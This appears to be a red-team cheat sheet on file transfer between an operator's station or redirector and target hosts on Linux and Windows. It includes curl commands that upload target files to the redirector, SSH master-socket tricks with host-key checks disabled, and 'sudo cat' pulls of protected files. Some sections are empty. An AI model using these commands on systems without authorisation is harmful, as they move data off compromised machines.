# **Basic Information** # **Linux** ## **HTTP** ```bash # run on the op station python3 -m http.server <REDIR_PORT> python3 -m pip install --user uploadserver python3 -m uploadserver -d <LOCAL_DIR> --basic-auth <USER>:<PASSWORD> <REDIR_PORT> # run on target wget http://<REDIR_IP>:<REDIR_PORT>/<LOCAL_FILE> curl http://<REDIR_IP>:<REDIR_PORT>/<LOCAL_FILE> -o <REMOTE_FILE> curl -X POST <http://<REDIR_IP>:<REDIR_PORT>/upload> -F 'files=@<LOCAL_FILE>' -u <USER>:<PASSWORD> ``` ## **SSH** ```bash # ensure ControlMaster is enabled for the ssh client # echo " ControlMaster auto" | sudo tee -a /etc/ssh/ssh_config # sudo systemctl restart ssh # connect to target and setup a master socket ssh -M -S /tmp/socket_name -p <TGT_PORT> <USER>@<TGT_IP> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no # have permissions to read the remote file, pull to local host scp -o ControlPath=/tmp/socket_name -s -T dummy:'/remote/file.txt' <LOCAL_FILE> # have permissions to read directory, pull to local host scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'/remote/dir' <LOCAL_DIR> # do not have rights to read file, pull to local host ssh -S /tmp/socket_name dummy "sudo cat <REMOTE_FILE>" > <LOCAL_FILE> # push a file to the target scp <LOCAL_FILE> <USER>@<TGT_IP>:<REMOTE_FILE> ``` ## **Base64** ```bash # run on the op station file <LOCAL_FILE> md5sum <LOCAL_FILE> base64 <LOCAL_FILE> -w 0 # run on target, validate transfer was successful via hash echo <BASE64_ENCODED_DATA> | base64 -d > <LOCAL_FILE> file <LOCAL_FILE> md5sum <LOCAL_FILE> ``` # **Windows** ## **SSH** ```bash # to enable master sockets, modify the client config so that ControlMaster is set to auto or yes # connect to target and setup a master socket ssh -M -S /tmp/socket_name -p <TGT_PORT> <USER>@<TGT_IP> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no # have permissions to read the remote file, pull to local host scp -o ControlPath=/tmp/socket_name -s -T dummy:'C:\\remote\\file.txt' <LOCAL_FILE> scp -o ControlPath=/tmp/socket_name -s -T'@:/C:/remote/*.log' <LOCAL_FILE> # have permissions to read directory, pull to local host scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'C:\\remote\\dir' <LOCAL_DIR> # push a file to the target scp <LOCAL_FILE> <USER>@<TGT_IP>:<REMOTE_FILE> ``` ## **Base64** ```bash # run on the op station # run on target ``` # **References** - [Using the SSH "Konami Code" (SSH Control Sequences)](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences) # **Practical Application** | Platform | Name | Notes | | -------- | ---- | ----- | | | | |